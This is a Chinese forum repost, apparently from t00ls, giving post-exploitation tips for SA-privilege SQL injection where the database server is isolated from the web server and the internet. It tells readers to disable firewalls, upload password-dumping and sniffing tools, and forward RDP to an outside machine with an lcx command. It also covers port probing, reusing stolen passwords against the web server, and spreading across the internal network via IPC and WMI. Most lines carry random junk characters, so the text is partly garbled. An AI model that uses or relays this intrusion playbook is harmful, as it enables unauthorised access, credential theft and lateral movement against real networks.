当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。- C1 h4 |% z5 ]( h; l" V
8 L- r5 C' T, V& I/ S; h3 _4 f
' ?8 g* E/ D* f) C# u. w) |* F* ~) ^# B
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)8 U. B7 B% p- @
( o+ z# [2 I; ]- Q6 Y! b9 l' I/ ?
& w3 E1 B6 C8 s6 ^9 n
一、DB机有公网IP.
$ Y) z" y3 F9 J M; H
0 Z' {: J) k: x4 R1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
) o! J. r0 b+ [8 U( ^! a/ a# D# g1 S# M! A/ x2 M( @6 Z
2 z5 B- i4 }1 s# h, A9 D
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.7 W4 d. u+ A- ~( d \* l& z" O
& }& y+ c; E$ v! g% s# i, M! }( P9 k7 I; {
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
) T7 a5 ]& i7 N7 ^( s' B& ^& T; F+ \( G
8 J8 C1 q8 u5 e h3 p4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
! ]+ N5 `% T" j1 s* O
. q% d1 }: ?: s. f+ [2 r: h! B @5 m' Q3 _$ p3 M
x5 q. n* n% r2 D/ Z2 r% C二、DB机只有内网IP
; Y$ ~$ p5 \. u( v# P0 ^% Q
3 H. o3 k' Z; j+ M1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.7 ~& V# p( ^8 }8 y/ k% B
. K1 J2 }( g7 a% g0 s1 _. L
/ f$ S+ c- o' I+ v: T- B2 P2 M" n: z
2:停掉防火墙和IP策略再从内往外扫描.
~5 F' H: C8 q" X; W9 J2 a
! W8 b& E& s, w ~& p, N( O5 I- A- G& m A
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.! ?# {* A/ h8 F6 H
# U( ~% O7 H( p! ?6 q! ^
' t/ V6 [# B% v& \8 @9 ^- y4:学会密码规律分析往往会有惊喜.
5 E G. \4 D+ Y' m5 H. y, L' w8 ~
u- }4 _1 H# l& N2 ]$ n% G7 K2 d
' N" b" m2 K" I8 ~& @8 m( _5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
1 \1 N3 ]. U" _
9 W! f& g9 G* B9 B& N( y1 M5 x; a8 U4 m+ C5 F0 B
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |